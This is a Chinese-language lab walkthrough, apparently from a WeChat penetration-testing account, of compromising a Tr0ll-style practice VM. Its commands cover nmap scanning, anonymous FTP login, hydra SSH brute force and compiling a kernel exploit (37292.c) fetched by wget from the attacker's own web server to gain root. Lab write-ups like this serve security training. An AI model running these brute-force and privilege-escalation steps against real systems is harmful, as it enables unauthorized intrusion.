总体步骤
1.确定目标 :根据给出的域名或者资产确定出具体目标具体ip,是不是含有cdn技术,绕过找到目标ip。
2.信息收集:通过第一步找到的具体目标ip后,对其端口扫描,查看开放了那些端口,比如开放21ssh端口,可允许匿名的上传下载,爆破,嗅探,win提权,远程执行(proftpd 1.3.5),各类后门(proftpd,vsftp 2.3.4) ,22端口ssh可进行爆破,隧道及内网代理转发,文件传输等等,以及80端口访问web端进行信息收集和常见漏洞测试。
3.发现漏洞:查看各端口脆弱点进行测试,找到漏 洞例如弱口令,cms版本exp等等。
4.漏洞利用:例如通过弱口令登入到ssh,通过爆破登入到ssh,一般为低权限。
5.权限提升:正对于第四步拿到的低权限账号进行提权,Linux提权的主要几个方式:
1.内核提权---脏牛提权最为典型 ,内核提权一般包括3个步骤,信息收集发现版本号,找到
相关版本的exp,使用找到的exp对目标发起攻击,完成提权功能。2.利用suid提权 。3.利用sudo提权 4.mfs提权。5.mysql提权 包括udf mof提权方式。
这些提权方式后面靶机都有遇到讲解。
详解每一步
1.确定目标:先看自己本地kali的ip,使用命令ifconfig,确定自己的ip为192.168.85.129,接下来确定自己要打的主机是那个,目标ip是那个,使用到的工具nmap -sP 192.168.85.0/24命令,其中 0/24表示这个网段的IP地址从192.168.0.1开始,到192.168.0.254结束,相当于扫描与主机ip处于同一网段下的全部主机ip
扫出来5个ip,其中.1 .2 .254 .129都是kali里面的,确定为192.168.85.128是目标ip。
2.信息收集:找到目标ip后进行信息收集,首先查看开放了那些端口,使用到nmap,命令:namp -p- ip
可以看到开放了21端口ftp,可以想到可能存在弱口令,然后开放了22端口ssh可以对其爆破,然后看到80端口web端,可以对其进行常见漏洞测试,然后在使用到命令 namp -p- -sS -sV -A 192.168.85.128 进行各个端口的详细查看
3.确定漏洞:可以看见各个端口的详细信息,可以看到21端口有个Anonymous登入过,我们可以尝试进行弱口令登入,账户名和密码都输入为Anonymous进行尝试
成功登入输入ls查看里面存在什么文件
发现存在一个流量包文件lol.pcap,输入命令get 文件名把这个文件下载到我们本地kali上,然后是一个流量包,我们可以使用工具进行分析,输入
wireshark lol.pcap
对其流量分析找到一个文件,进行访问
讲这个文件下载到本地,然后使用file roflmao进行分析
得到另外一个路径,访问此路径
这里可以拿到一个用户名的字典和一个确定的密码,接下来使用hydra进行爆破ssh端口账号
hydra -L user -p Pass.txt 192.168.85.128 ssh
成功爆破出账号overflow 密码:Pass.txt
ssh远程登录:ssh overflow@192.168.85.128
4.漏洞利用:可以看到当前登入的用户是一个低权限用户,需要对其提权,在本地kali上搜索输入
searchsploit Linux 4-Tr0ll 3.13.0
找到 linux/local/37292.c exp
5.提权:在本地开启web服务,下载到对方服务器里面去
python -m http.server 8083
开启后ssh靶机,然后进入到tmp路径下,wget kali开放的8083端口下载本地的37292.c的文件。
cd /tmpwget http://192.168.188.128:8083/37292.c然后编译它
gcc 37292.c -o yc #输出一个执行文件名为yc然后运行这个yc
./yc再次输入id,会发现提权成功!
以上靶机已放交流群,还有讲解的完整演示视频也放,需要的师傅关注微信公众号领取。
关注微信公众号0到1渗透测试